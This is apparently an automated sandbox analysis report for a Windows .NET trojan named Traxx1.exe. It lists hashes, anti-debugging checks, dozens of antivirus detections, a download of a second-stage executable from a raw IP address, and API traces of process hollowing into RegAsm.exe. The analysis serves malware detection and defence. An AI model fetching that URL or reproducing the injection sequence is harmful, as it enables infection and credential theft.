Summary | ZeroBOX

Traxx1.exe

ScreenShot AntiDebug PE File PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 22, 2024, 5:20 p.m. Sept. 22, 2024, 5:25 p.m.
Size 13.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 937239c0053f3daec25ca7984676696a
SHA256 eb251bcaa5b53828d633351ea3bf94601128d2d6894272308e9461939d4ac306
CRC32 42EE8812
ssdeep 384:b7/1TebgIciVU6c35z1R5MqP4V48QbTf6Q:bT1Te505xiSbTff
PDB Path C:\Users\Administrator\Desktop\RunPe-x32\RunPE\obj\Release\Selenium.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path C:\Users\Administrator\Desktop\RunPe-x32\RunPE\obj\Release\Selenium.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/u9.exe
request GET http://147.45.44.131/files/u9.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 660
region_size: 1376256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00720000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 660
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00490000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00322000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00365000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0036b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00367000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0034c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0032c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0032a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00356000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0035a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00357000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0034a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0035b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 660
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00752000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 147.45.44.131
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2176
region_size: 335872
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description Traxx1.exe tried to sleep 2728163 seconds, actually delayed analysis time by 2728163 seconds
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELŠŽÈfà ‚Ì@œ@ @… ÄxÐ4D0Ŭ.textȁ‚ `.rdataW( *†@@.data(ñÐ\°@À.reloc4DÐF @B
base_address: 0x00400000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2176
process_handle: 0x00000438
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELŠŽÈfà ‚Ì@œ@ @… ÄxÐ4D0Ŭ.textȁ‚ `.rdataW( *†@@.data(ñÐ\°@À.reloc4DÐF @B
base_address: 0x00400000
process_identifier: 2176
process_handle: 0x00000438
1 1 0
Process injection Process 660 called NtSetContextThread to modify thread in remote process 2176
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4234304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2176
1 0 0
Process injection Process 660 resumed a thread in remote process 2176
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2176
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000194
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000378
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x000003ac
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x000003c0
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x000003e8
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x000003fc
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000428
suspend_count: 1
process_identifier: 660
1 0 0

NtResumeThread

thread_handle: 0x00000414
suspend_count: 1
process_identifier: 660
1 0 0

CreateProcessInternalW

thread_identifier: 2180
thread_handle: 0x00000434
process_identifier: 2176
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

NtGetContextThread

thread_handle: 0x00000434
1 0 0

NtAllocateVirtualMemory

process_identifier: 2176
region_size: 335872
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELŠŽÈfà ‚Ì@œ@ @… ÄxÐ4D0Ŭ.textȁ‚ `.rdataW( *†@@.data(ñÐ\°@À.reloc4DÐF @B
base_address: 0x00400000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0043a000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0043d000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0044d000
process_identifier: 2176
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2176
process_handle: 0x00000438
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4234304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2176
1 0 0

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2176
1 0 0
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.4!c
Skyhigh Artemis!Trojan
Cylance Unsafe
VIPRE Gen:Heur.MSIL.Krypt.6
Sangfor Trojan.Msil.Injector.Vt5c
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Heur.MSIL.Krypt.6
K7GW Trojan ( 0050bedf1 )
K7AntiVirus Trojan ( 0050bedf1 )
Arcabit Trojan.MSIL.Krypt.6
VirIT Trojan.Win32.MSIL.HDL
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Injector.LOS
Avast Win32:PWSX-gen [Trj]
ClamAV Win.Packed.Pwsx-10035668-0
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba Trojan:MSIL/Injector.d73b52de
NANO-Antivirus Trojan.Win32.Krypt.krfxzh
MicroWorld-eScan Gen:Heur.MSIL.Krypt.6
Rising Trojan.Injector!8.C4 (CLOUD)
Emsisoft Gen:Heur.MSIL.Krypt.6 (B)
F-Secure Trojan.TR/Injector.iqnif
DrWeb Trojan.InjectNET.17
Zillya Trojan.Injector.Win32.1852594
TrendMicro TrojanSpy.Win32.LUMMASTEALER.YXEH1Z
McAfeeD ti!EB251BCAA5B5
CTX exe.trojan.msil
Sophos Troj/MSILIn-BFP
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.937239c0053f3dae
Google Detected
Avira TR/Injector.iqnif
Antiy-AVL Trojan/Win32.Agent
Kingsoft MSIL.Trojan.Agent.gen
Microsoft Trojan:MSIL/Zusy.HNH!MTB
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Gen:Heur.MSIL.Krypt.6
Varist W32/MSIL_Troj.C.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5658263
McAfee Artemis!937239C0053F
DeepInstinct MALICIOUS
VBA32 Trojan.MSIL.DiscoStealer.Heur
Malwarebytes Trojan.Injector.MSIL.Generic
Ikarus Trojan.MSIL.Injector
Panda Trj/GdSda.A
TrendMicro-HouseCall TrojanSpy.Win32.LUMMASTEALER.YXEH1Z
Tencent Malware.Win32.Gencirc.1417e59c
Yandex Trojan.Agent!nOj1JlPdVx8